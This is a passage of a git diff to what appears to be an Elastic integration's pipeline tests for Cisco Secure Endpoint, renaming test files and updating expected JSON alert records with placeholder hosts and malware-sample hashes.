                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176259286289613000",
@@ -3014,8 +3046,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619339685Z",
+                "ingested": "2021-09-30T00:14:16.070192600Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176259234750005000",
@@ -3093,8 +3126,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619341438Z",
+                "ingested": "2021-09-30T00:14:16.070194607Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176259183210398000",
@@ -3191,8 +3225,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619343258Z",
+                "ingested": "2021-09-30T00:14:16.070196717Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6180335966167761000",
@@ -3284,8 +3319,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619345019Z",
+                "ingested": "2021-09-30T00:14:16.070198772Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533668885361590000",
@@ -3369,8 +3405,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619346764Z",
+                "ingested": "2021-09-30T00:14:16.070200818Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533668885361590000",
@@ -3454,8 +3491,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619348487Z",
+                "ingested": "2021-09-30T00:14:16.070202819Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533668885361590000",
@@ -3533,8 +3571,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619350225Z",
+                "ingested": "2021-09-30T00:14:16.070204840Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176259135965757000",
@@ -3611,8 +3650,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:08.619351968Z",
+                "ingested": "2021-09-30T00:14:16.070206862Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
+                "code": "1107296272",
                 "kind": "alert",
                 "start": "2021-01-15T10:17:41.000Z",
                 "action": "Executed malware",
@@ -3693,8 +3733,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619353708Z",
+                "ingested": "2021-09-30T00:14:16.070208933Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251516445164000",
@@ -3776,8 +3817,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619355437Z",
+                "ingested": "2021-09-30T00:14:16.070210963Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251516445164000",
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json
index 2f5cd52d9f5..906c5f988fb 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json
@@ -34,8 +34,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853374465Z",
+                "ingested": "2021-09-30T00:14:30.174499815Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -117,8 +118,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853378663Z",
+                "ingested": "2021-09-30T00:14:30.174504805Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -200,8 +202,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853380563Z",
+                "ingested": "2021-09-30T00:14:30.174507048Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -283,8 +286,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853382340Z",
+                "ingested": "2021-09-30T00:14:30.174509121Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 